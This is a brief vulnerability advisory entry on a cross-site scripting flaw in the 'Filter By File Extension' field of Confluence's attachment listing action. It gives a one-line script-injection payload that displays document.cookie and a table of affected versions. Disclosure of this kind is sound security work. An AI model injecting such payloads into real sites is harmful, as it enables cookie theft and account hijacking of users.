Description:
XSS via the βFilter By File Extensionβ field in app/spaces/listattachmentforspace.action.
Exploit:
blah"><script>alert(document.cookie)</script><x x="
CPE | Name | Operator | Version |
---|---|---|---|
confluence | lt | 2.5.6 | |
confluence | le | 2.5.4 | |
confluence | lt | 2.6.0 |